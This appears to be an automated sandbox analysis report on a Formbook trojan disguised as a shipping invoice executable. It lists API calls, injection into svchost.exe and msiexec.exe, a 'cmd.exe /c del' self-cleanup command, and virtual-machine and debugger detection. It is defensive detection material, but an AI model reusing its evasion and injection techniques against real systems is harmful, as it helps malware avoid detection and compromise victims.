Source: Process Memory Space: svchost.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msiexec.exe PID: 7804, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@13/2

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0044AF5C GetLastError,FormatMessageW,

0_2_0044AF5C

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,	0_2_00464422
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,	0_2_004364AA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00442F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,	4_2_00442F93

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D517

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

0_2_0043701F

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,

0_2_0047A999

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043614F

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_00447DD0 StartServiceCtrlDispatcherW,GetLastError,

4_2_00447DD0

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_00447DD0 StartServiceCtrlDispatcherW,GetLastError,

4_2_00447DD0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

File created: C:\Users\user\AppData\Local\Temp\murky

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Command line argument: Wu

0_2_0040D7F0

Source: Invoice Packing list For Sea Shipment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Invoice Packing list For Sea Shipment.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

File read: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Source: unknown	Process created: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe "C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Contains functionality to detect sleep reduction / modifications

Source: Invoice Packing list For Sea Shipment.exe

Static file information: File size 1092191 > 1048576

Source:	Binary string: msiexec.pdb source: svchost.exe, 00000002.00000002.1493513112.0000000005490000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1491818031.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491882471.000000000323C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.3868459041.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000002.1493513112.0000000005490000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1491818031.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491882471.000000000323C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3868459041.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1435137073.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1433632710.0000000004440000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1436232911.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1438282355.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1494333666.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1492648847.000000000481B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1435137073.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1433632710.0000000004440000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1492808765.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1436232911.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1438282355.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.3870110705.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1494333666.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1492648847.000000000481B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3882809857.000000000FEDF000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870962113.00000000050CF000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3869139231.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3882809857.000000000FEDF000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870962113.00000000050CF000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3869139231.0000000002E66000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: Invoice Packing list For Sea Shipment.exe

Static PE information: real checksum: 0xa2135 should be: 0x116eea

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004171D1 push ecx; ret	0_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041285C push cs; retf	2_2_0041285F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417008 pushfd ; retf	2_2_0041700F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004171EF push ds; iretd	2_2_004171FD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E992 push dword ptr [08CCB4BEh]; ret	2_2_0041E9AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E9B2 push dword ptr [0ECCDC24h]; ret	2_2_0041EACE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A81 pushfd ; retf	2_2_00416A82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417ABC push edi; ret	2_2_00417ABD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E46D push ebx; retf	2_2_0040E470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D475 push eax; ret	2_2_0041D4C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4C2 push eax; ret	2_2_0041D4C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4CB push eax; ret	2_2_0041D532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D52C push eax; ret	2_2_0041D532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E530 push edi; ret	2_2_0041E532
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004177BF push B417C20Bh; ret	2_2_004177C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCEB02 push esp; retn 0000h	2_2_03CCEB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCEB1E push esp; retn 0000h	2_2_03CCEB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCE9B5 push esp; retn 0000h	2_2_03CCEAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E429B02 push esp; retn 0000h	3_2_0E429B03
Source: C:\Windows\explorer.exe	Code function: 3_2_0E429B1E push esp; retn 0000h	3_2_0E429B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4299B5 push esp; retn 0000h	3_2_0E429AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10D619B5 push esp; retn 0000h	3_2_10D61AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10D61B1E push esp; retn 0000h	3_2_10D61B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_10D61B02 push esp; retn 0000h	3_2_10D61B03
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00449F2D push ecx; ret	4_2_00449F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04B827FA pushad ; ret	4_2_04B827F9

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	File created: \invoice packing list for sea shipment.exe
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	File created: \invoice packing list for sea shipment.exe			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_00447DD0 StartServiceCtrlDispatcherW,GetLastError,

4_2_00447DD0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_004772DE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004375B0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00444078

0_2_00444078

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	API/Special instruction interceptor: Address: 3E3824C
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7B0774
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7AD8A4
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5739	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4195	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 882	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 865	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-85925

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-84640

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	API coverage: 3.0 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\msiexec.exe	API coverage: 1.7 %

Source: C:\Windows\explorer.exe TID: 8116	Thread sleep count: 5739 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8116	Thread sleep time: -11478000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8116	Thread sleep count: 4195 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8116	Thread sleep time: -8390000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7960	Thread sleep count: 137 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7960	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7960	Thread sleep count: 9836 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7960	Thread sleep time: -19672000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Source: explorer.exe, 00000003.00000000.1444179023.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: Invoice Packing list For Sea Shipment.exe, 00000000.00000002.1438907874.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1440690019.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000003.00000003.2289271188.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: Invoice Packing list For Sea Shipment.exe, 00000000.00000002.1438907874.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: explorer.exe, 00000003.00000000.1440690019.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 00000003.00000000.1444179023.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000000.1444179023.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1440690019.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000003.2289271188.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1440690019.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	API call chain: ExitProcess graph end node			graph_0-84490
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	API call chain: ExitProcess graph end node			graph_0-84611

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0045A259 BlockInput,

0_2_0045A259

